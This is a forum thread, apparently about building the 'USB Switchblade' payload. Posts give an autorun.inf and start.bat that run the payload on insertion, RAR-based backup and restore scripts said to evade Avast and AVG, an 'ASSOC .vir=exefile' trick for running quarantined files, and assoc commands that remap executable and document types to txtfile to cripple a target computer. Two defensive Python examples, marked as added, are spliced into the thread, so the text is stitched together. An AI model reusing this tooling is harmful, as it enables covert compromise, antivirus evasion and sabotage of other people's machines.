
USB Pocket-Knife Development


Leapo


...my code is much cleaner and more readable because I have written my code from scratch and not just ripped the code from the wiki (sorry, had to say it)...
No offense taken, I know large portions of my payload are direct rips from the wiki, I'm just trying to make everything play nice together. Once I've crammed everything in, I might go back and start streamlining the inner workings a little (look at how much better fc_slurp.bat and fc_slurp2.bat are compared to their predecessors from version 0.2).

...You posted while I was writing. Yes, this may be possible, but it may also delete the archive while it is being accessed. To solve that you may need to copy the encrypted volume before extracting; that way you never extract from the original volume and it will stay intact. You could try this with TrueCrypt (good encryption, easy to use via command line) but you may not always have access to extract.
Yeah, I was worried about AVs killing the backup archive. I'll give TrueCrypt a shot; copying the archive and then extracting from the copy should keep everything nice and safe (as long as TrueCrypt works).

I know how to get it U3 compatible. Here we go! I really hope this works.

[AutoRun]
open=start.bat

@echo off

@start /min for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do %%i:Manual_Scan.bat

@exit

I will try to upload the U3CUSTOM.ISO when I can.
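The autorun.inf above makes Windows run start.bat as soon as the volume is inserted. Below is an added example (my own Python, not code from this thread or the Switchblade project) of the check a USB triage station could run on a volume before it reaches a workstation: it parses an autorun.inf with configparser and reports every open, shellexecute or shell\<verb>\command entry, since those are the keys whose value gets executed. The sample .inf strings are constructed.

```python
"""Added example (not from the thread or the Switchblade project): inspect an
autorun.inf and report the entries that make Windows launch something when the
volume is inserted, such as the "open=start.bat" line posted above."""
import configparser
from dataclasses import dataclass
from typing import List

# Keys whose value is executed by the AutoRun handler: "open" runs a program,
# "shellexecute" hands a path to ShellExecute. A "shell\<verb>\command" key
# defines a context-menu verb that "shell=<verb>" can make the default action.
LAUNCH_KEYS = {"open", "shellexecute"}


@dataclass
class Finding:
    key: str
    value: str
    reason: str


def inspect_autorun(text: str) -> List[Finding]:
    """Parse autorun.inf text and return one Finding per launching entry.

    Windows treats section and key names case-insensitively; configparser
    lower-cases keys by default and the section name is lower-cased here.
    strict=False tolerates duplicate keys, interpolation=None keeps '%'
    (as in %SystemRoot%) from being treated as a substitution.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       delimiters=("=",), comment_prefixes=(";", "#"))
    try:
        parser.read_string(text)
    except configparser.Error as exc:
        # A file that does not parse is itself worth a look: report it rather
        # than silently treating it as harmless.
        return [Finding("<file>", "", "unparseable autorun.inf: " + type(exc).__name__)]

    findings = []
    for section in parser.sections():
        if section.lower() != "autorun":
            continue
        for key, value in parser.items(section):
            if key in LAUNCH_KEYS:
                findings.append(Finding(key, value, "program is run on insertion"))
            elif key.startswith("shell\\") and key.endswith("\\command"):
                findings.append(Finding(key, value, "custom shell verb runs a command"))
    return findings


# Constructed samples: the first is the entry shown in the post, the second is
# a typical benign file that only sets a label and an icon.
SUSPECT_INF = "[AutoRun]\nopen=start.bat\n"
BENIGN_INF = "[autorun]\nlabel=Holiday photos\nicon=photos.ico\n"

if __name__ == "__main__":
    for name, inf in (("suspect", SUSPECT_INF), ("benign", BENIGN_INF)):
        hits = inspect_autorun(inf)
        print(name, "->", [(f.key, f.value, f.reason) for f in hits] or "nothing launches")
```

Windows has not honoured autorun.inf on USB flash drives since the 2011 AutoRun update (it still does for optical media, which is why the U3 CD partition matters in this thread), so the check is most useful when examining images of older hosts or vetting drives destined for legacy machines.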

Re: New version

I have mirrors!

DepositFiles, FileSend, ZUpload, and Badongo.

Once again, many thanks for the help Elmer! I'll copy those mirrors over to my post right now.

Upload your ISO whenever you get a chance. For now, I'll build an ISO on my end using your code and upload it so U3 users can get in on the action.

Re: Protection from AV

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using TrueCrypt with the switchblade.

Yes, it's actually very simple to do, although the problem is TrueCrypt doesn't always work. Then again, I guess if you don't have permissions to use TrueCrypt the logs generated wouldn't be much use. Once again, it would be a valid idea to copy the volume and never extract from the original volume; AVs can decimate a volume if you can access it.

Now there's an idea, the TrueCrypt volume could be located on the CD partition for the U3 compatible version of my payload. This would ensure that the backup doesn't get nuked (on the U3 version anyway), and still allow for easy access to the guts of the payload on the flash portion of the disk.

BTW, You also said something about working on your own custom solution for this? What might that entail?


Wee! I got the ISO done! Use it with the Universal U3 Customizer thing. I forgot how easy it was to make these things with the Universal Customizer.

MegaUpload, RapidShare, Badongo, Deposit Files, and FileSend.

EDIT: Wow, I completely forgot to reply about the TrueCrypt stuff

I don't think the CD partition is big enough to hold the files.


BTW, You also said something about working on your own custom solution for this? What might that entail?

Pretty much the same concept. I'll go into detail of how I was going to work this. If you give me a few days until I have released V2.0 of my payload I can script this for you; else take a crack at it yourself.

- copy the original encrypted volume

- mount the second encrypted volume to the next free drive letter

- detect where it was mounted

- execute the payload from the mounted drive

- stash logs on the flash drive not in the encrypted volume

- dismount the encrypted volume

- delete the second encrypted volume

and then possibly move the logs to another encrypted volume if I decide to be paranoid :-P

I am going to modify my payload to work like this after I release V2.0. I'll let you know when I have started working on this.


Leapo:

You might want to make a note that you need to use the Universal Customizer to use the U3 ISO. Place the U3CUSTOM.ISO file in BIN (I think) for it to use it instead of the default one.


Would it be possible to put the exe files on the U3 side also, that way AV programs can't screw with them? (Here at work McAfee renames them to .vir files.)

Hey, just to be a pain, you could use assoc and make all .vir files act like .exe :-P Though this could also be very bad...

Add this line to the start of his PL:

ASSOC .vir=exefile

That should make them executable. To fix this so you don't accidentally run a known virus, add this to the end of his payload:

ASSOC .vir=

This will make Windows prompt you if you try to execute the .vir normally :-P Hope this helps, let me know.


@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

@GonZor

That's a really good idea. I think this should be put into the next version of his payload.


@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

@GonZor

That's a really good idea. I think this should be put into the next version of his payload.

Well, it's his PL, it's up to him. The U3 partition I have stretched to 13MB on my current PL (V2.0 BETA) and nothing has gone wrong, although it would require him rewriting a lot of his code.

EDIT - My Current ISO is 13,537,280 bytes


@ elmer: I'll get right on that.

@ setzer: It would involve some major changes to make my payload run entirely from the U3 portion of the flash drive. I have a working proof of concept that might make putting the files on the CD partition unnecessary anyway. It's basically an automated backup and restore function (currently using an encrypted RAR archive just to see if the concept works, I'm planning on using TrueCrypt in the future for extra security).

Here's how you set it up:

- Set up a clean switchblade that hasn't been nuked by your antivirus yet.

- Download this zip file. (http://rapidshare.com/files/37957439/Restore.zip.html)

- Drop the "Restore" folder (from the zip file you just downloaded) onto the root of the switchblade.

- Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of everything on the switchblade.

Now you're all set. After your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again:

- Plug the switchblade into a safe computer.

- Run "Restore.bat" to restore the backup.

- Your switchblade is now restored back to the last time you ran "Update_Archive.bat".

Here's the code if you want to take a look at it:

Update_Archive.bat:

:: Removes old backup if it exists
::
del ".\Backup.rar"

:: Archives and encrypts the contents of the switchblade with a stupidly long password
::
.\rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".\Backup.rar" ".."

Restore.bat:

:: Creates a backup copy of our backup. This is just in case you didn't plug your switchblade into
:: a safe computer before attempting to restore. This should keep your real backup safe while the
:: antivirus nukes the copy
::
copy ".\Backup.rar" ".\Backup_Safe.rar"

:: Here we unarchive the copy of the backup we just made
::
.\rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".\Backup_Safe.rar" ".."

:: And now that it's finished, we delete the backup of the backup.
::
del ".\Backup_Safe.rar"

Keep in mind that this is just a proof of concept! It fools Avast and AVG Antivirus as long as you don't attempt to restore on a system that has its antivirus active, but I can't yet guarantee that this will be completely foolproof.

@GonZor:

I'm sooo tempted to add that line to my payload :lol: . Only problem is, it'll still break batch scripts that look for *.exe because the file extension has been changed to *.vir

I already have a batch file that changes all executable associations (bat, exe, cmd, etc.) to text files, but I'm debating as to whether I should include it as an optional module in my payload, considering it completely screws over whatever system you run it on unless you can get to the recovery console to fix it.


@GonZor:

I'm sooo tempted to add that line to my payload :lol:

Yeah I'll be adding that option on to completely screw over the computer :-P

With your restore.bat, the only thing I can suggest is that you run it at the beginning of your PL; this automates the process. When you think about it, it won't make any difference; it will just mean the AV decimates your PL as it's extracting rather than when it's logging, and it doesn't matter if the AV screws over one copy simply because the second copy will always be there. If that makes any sense at all.


Ok, I've cleaned up my backup script a little and plugged it into Start.bat so that it runs right after avkill.exe (might as well try killing whatever antivirus you have running). I'm also working on a batch file (nuke.bat) that will do all kinds of nasty things to the target computer, not the least of which will be changing most file associations to TXTFILE (disabled by default for obvious reasons). Both new features will be in the next payload version.

I've tested it out, and the restore feature works like a charm, but I have a few concerns about it. First of all, it takes a while to restore the entire flash drive from the backup (although the user can turn it off if they know they won't be needing it). Second, I'm kinda worried about what these repeated write cycles will do to people's thumb drives; I don't want to kill anybody's flash drive prematurely because of my backup and restore script.

I'm also toying around with your idea of re-associating *.vir files as executables, but any time a batch file calls for *.exe, it fails. I'm going to keep working on this...


Yeah I'll be adding that option on to completely screw over the computer :-P

If you really want to screw the computer, do this:

assoc .bat=txtfile
assoc .com=txtfile
assoc .cmd=txtfile
assoc .exe=txtfile
assoc .doc=txtfile
assoc .ppt=txtfile
assoc .xls=txtfile
assoc .jpg=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .avi=txtfile
assoc .mpg=txtfile

and that's just a few of the extensions you could mess with. Credit: Original idea from here.

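Both the .vir=exefile re-association suggested earlier in the thread and the txtfile list just above show up as drift from a known-good baseline. As an added example (my own Python, not code from this thread or the Switchblade project), the script below parses two `assoc` dumps, one taken from a clean machine and one from a machine under review, and reports every extension whose mapping differs, calling out the two cases that matter most: an extension that newly resolves to an executable ProgID and an executable type that no longer does. The dumps embedded in it are constructed, and the set of executable ProgIDs is an assumption to adjust for your environment.

```python
"""Added example (not from the thread or the Switchblade project): compare a
fresh `assoc` dump against a baseline from a known-good host and flag file-type
associations that have been tampered with."""
from typing import Dict, List, Tuple

# ProgIDs under which Windows runs the file instead of opening it in a viewer.
# Assumption: this covers the stock executable types; extend it if your
# environment registers others.
EXECUTABLE_PROGIDS = {"exefile", "batfile", "cmdfile", "comfile", "scrfile", "piffile"}


def parse_assoc(text: str) -> Dict[str, str]:
    """Turn `assoc` output (one ".ext=ProgID" line each) into a dict.

    Extensions and ProgIDs are case-insensitive in the registry, so both are
    folded to lower case; lines that are not ".ext=..." are skipped.
    """
    mapping = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith(".") or "=" not in line:
            continue
        ext, progid = line.split("=", 1)
        mapping[ext.strip().lower()] = progid.strip().lower()
    return mapping


def audit_assoc(baseline_text: str, current_text: str) -> List[Tuple[str, str, str, str]]:
    """Return (extension, baseline ProgID, current ProgID, reason) for every
    association that differs from the baseline, sorted by extension."""
    baseline = parse_assoc(baseline_text)
    current = parse_assoc(current_text)
    findings = []
    for ext in sorted(set(baseline) | set(current)):
        before = baseline.get(ext, "")
        after = current.get(ext, "")
        if before == after:
            continue
        if after in EXECUTABLE_PROGIDS:
            reason = "now runs as an executable"        # e.g. .vir=exefile
        elif before in EXECUTABLE_PROGIDS:
            reason = "executable type no longer runs"   # e.g. .exe=txtfile
        else:
            reason = "association changed"
        findings.append((ext, before, after, reason))
    return findings


# Constructed dumps standing in for `assoc > baseline.txt` on a clean machine
# and `assoc > current.txt` on the machine under review.
BASELINE_DUMP = """\
.bat=batfile
.cmd=cmdfile
.com=comfile
.exe=exefile
.jpg=jpegfile
.txt=txtfile
"""
CURRENT_DUMP = """\
.bat=txtfile
.cmd=cmdfile
.com=comfile
.exe=txtfile
.jpg=txtfile
.txt=txtfile
.vir=exefile
"""

if __name__ == "__main__":
    for ext, before, after, reason in audit_assoc(BASELINE_DUMP, CURRENT_DUMP):
        print(f"{ext:6} {before or '<none>':10} -> {after or '<none>':10} {reason}")
```

Run `assoc > baseline.txt` once on a clean host and `assoc > current.txt` on the host being checked, then pass both files' contents to audit_assoc(). Anything it flags can be put back with the same assoc .ext=ProgID form used in the thread (for example assoc .exe=exefile) from an administrative command prompt.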

Mirror time! ZUpload, MegaUpload, FileSend, Badongo, and Deposit Files.

It's embarrassing how much up-bandwidth I have. Nobody in my family uploads anything except for a few photos here and there. Also embarrassing: how much time I have on my hands.


Haha, I wasn't exactly planning for the stand-alone script to need mass distribution, as it'll be included in the next full payload build.

Actually...that one might be a good idea after all. Considering that the version I posted here is a drop-in solution that should work on any switchblade, I think I'll throw up a little information about it on the Wiki.


I've added my Automated Backup and Restore module, as well as the Switchblade Kill Switch module to the Switchblade Packages page of the Wiki.

I'll throw up a link to my payload on the actual USB Switchblade page in a little bit, and maybe make a whole Wiki page dedicated to my payload when I have the time (I can go a lot more in-depth on a wiki page with no character limits).


@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

There isn't a limit to the U3 partition as long as it doesn't exceed the total size of the USB stick itself. The switchblade I am running right now has 836 MB on the disk side (I run apps like portable MS Office 07, Firefox, Photoshop CS2, and Nero Premium), but the USB drive I have is 4 GB so it isn't an issue. Even if we can't put the apps on the U3 side, the backup mod is very handy.


There isn't a limit to the U3 partition as long as it doesn't exceed the total size of the USB stick itself. The switchblade I am running right now has 836 MB on the disk side (I run apps like portable MS Office 07, Firefox, Photoshop CS2, and Nero Premium), but the USB drive I have is 4 GB so it isn't an issue. Even if we can't put the apps on the U3 side, the backup mod is very handy.

Wow, that's cool. The executables could be put on the CD partition. I don't know why I thought that it was limited. I think I read an article that said that once.

Also, you can run Photoshop CS2 from a thumb drive? I knew there was portable MS Office, but that's just downright cool.


There isn't a limit to the U3 partition as long as it doesn't exceed the total size of the USB stick itself. The switchblade I am running right now has 836 MB on the disk side (I run apps like portable MS Office 07, Firefox, Photoshop CS2, and Nero Premium), but the USB drive I have is 4 GB so it isn't an issue. Even if we can't put the apps on the U3 side, the backup mod is very handy.

Wow, that's cool. The executables could be put on the CD partition. I don't know why I thought that it was limited. I think I read an article that said that once.

Also, you can run Photoshop CS2 from a thumb drive? I knew there was portable MS Office, but that's just downright cool.

I think the early U3 drives had issues when expanded over 6MB, but the new drives seem to have no issues. It's possible with some modification to get this payload running from the U3 partition, although you would either need a massive change in the setup, or else it wouldn't be configurable.

